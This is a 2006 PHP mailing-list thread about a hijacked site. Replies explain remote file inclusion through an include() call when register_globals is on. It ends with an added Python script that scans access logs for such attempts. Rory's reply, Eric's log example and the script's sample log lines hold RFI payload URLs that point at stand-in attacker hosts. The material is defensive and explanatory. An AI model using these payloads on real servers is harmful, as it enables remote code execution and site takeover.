RE: Highjack?

Rory,

Thanks. I had meant to say, assuming globals is off...

-----Original Message-----
From: Rory Browne [mailto:rory.browne@xxxxxxxxx]
Sent: Monday, November 13, 2006 10:12 AM
To: PHP
Subject: Fwd:  Highjack?


---------- Forwarded message ----------
From: Rory Browne <rory.browne@xxxxxxxxx>
Date: Nov 13, 2006 7:12 PM
Subject: Re:  Highjack?
To: bedouglas@xxxxxxxxxxxxx



On 11/13/06, bruce <bedouglas@xxxxxxxxxxxxx> wrote:
>
> eric...
>
> you say how embarrassing regarding the $path.'foo'.... I'm curious, why/how
> is this simple piece of code exploitable, assuming $path is not something
> that comes via the url vars (GET/POST/REQUEST)


If register_globals is enabled, someone could request
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=


The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php


> it shouldn't be able to be touched by external/client processes...
> similarly, the 'foo' would be static, and couldn't be munged...
>
> thoughts/explanations...
>
> thanks
>
>
>
> -----Original Message-----
> From: Eric Butera [mailto:digital.tarsier@xxxxxxxxx]
> Sent: Monday, November 13, 2006 9:39 AM
> To: tedd
> Cc: PHP General List
> Subject: Re:  Highjack?
>
>
> On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote:
> > Hi gang:
> >
> > While this is not an obvious php question, it does deal with security
> > which is a concern.
> >
> > Just this morning had a couple of my sites "highjacked". What I found
> > was someone had replaced my root level index.php with their own
> > index.php. You can see the result at:
> >
> > http://xn--u2g.com/index1.php
> >
> > It was not a terrible loss nor inconvenience, but I wonder how they
> > did it. Any ideas how this was done and suggestions as to how to
> > prevent this from happening again?
> >
> > Thanks,
> >
> > tedd
> >
> > --
> > -------
> > http://sperling.com   http://ancientstones.com  http://earthstones.com
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >
>
> Tedd,
>
> I've seen this happen before when someone was able to do a remote code
> execution exploit on an old version of a very popular open source
> shopping cart project.  I'd say the first thing would be to try and
> find any include/require statements that are exploitable.  In the case
> I was dealing with, it was a problem with register_globals on and an
> include that looked a bit like this include($path .'script.php');.
> How embarrassing.
>
> If you have access to your server logs, look for URLs such as
> http://example.com/exploited.php?action=http://evil.example.com/inject.txt
>


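An added example, not code from the thread or from any of its posters, covering two points raised above: Eric's advice to look through the server logs for requests whose parameter value is itself a URL, and Rory's note on why the `?dummy=` tail matters. It parses Apache combined-format access-log lines, decodes the query string, flags any parameter whose value starts with a remote scheme, and marks values that contain a `?`, since that is what turns the fixed `'script.php'` suffix into part of the remote URL's query string. The log lines, IP addresses and host names are constructed for the example; the function names are my own.

```python
"""
Scan Apache combined-format access-log lines for remote file inclusion
(RFI) attempts: a query-string parameter whose value is itself a URL,
which a vulnerable include($path . 'script.php') under register_globals
would fetch and execute.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Schemes PHP's include() will fetch over the network when allow_url_fopen
# is on (the default in the PHP 4/5 installs of the time).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Apache "combined" log format; only the request-line fields are used here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (hypothetical hosts and addresses, not from
# the thread or any real server). Line 1 mirrors Rory's example, line 3
# Eric's, URL-encoded the way a scanner would send it; line 4 is a benign
# parameter that merely happens to carry a URL.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Nov/2006:10:12:01 +0000] "GET /badscript.php?path=http://www.badserver.com/badscript.txt?dummy= HTTP/1.1" 200 1432 "-" "Mozilla/4.0"
198.51.100.9 - - [13/Nov/2006:10:12:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 8321 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Nov/2006:10:12:09 +0000] "GET /exploited.php?action=http%3A%2F%2Fevil.example.com%2Finject.txt%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [13/Nov/2006:10:13:00 +0000] "GET /docs.php?ref=https://example.com/guide HTTP/1.1" 200 777 "http://example.com/" "Mozilla/5.0"
"""


def is_remote_url(value: str) -> bool:
    """True if a parameter value would make include() fetch a remote file."""
    return value.strip().lower().startswith(REMOTE_SCHEMES)


def effective_include(value: str, suffix: str = "script.php") -> str:
    """What include($path . 'script.php') actually opens when $path == value.

    A trailing '?dummy=' (or a bare '?') turns the fixed suffix into part of
    the remote URL's query string, so the attacker's file is fetched as-is.
    """
    return value + suffix


def find_rfi_attempts(log_text: str) -> list[dict]:
    """Return one record per (request, parameter) whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m.group("target"))
        # keep_blank_values so '?dummy=' style values survive; parse_qsl also
        # undoes percent-encoding, which scanners use to hide 'http://'.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if not is_remote_url(value):
                continue
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "script": parts.path,
                "param": name,
                "remote_url": value,
                # a '?' in the value is the tell-tale suffix-swallowing trick
                "swallows_suffix": "?" in value,
                "status": int(m.group("status")),
            })
    return hits


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        flag = "LIKELY RFI" if h["swallows_suffix"] else "review"
        print(f'{flag:10} {h["ip"]} {h["script"]} {h["param"]}={h["remote_url"]} -> {h["status"]}')
```

Run it over the real access log by passing the file's contents to `find_rfi_attempts`. The fourth sample line is the false-positive class to expect (a legitimate parameter carrying a URL), so triage on `swallows_suffix` and on the HTTP status first: a 200 against a script that does `include($path . ...)` means the remote file was very likely executed. The scan only finds the symptom; the fix is still the one implied in the thread: register_globals off, the include path checked against a fixed list of allowed values (and, on PHP 5.2 or later, allow_url_include left off).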
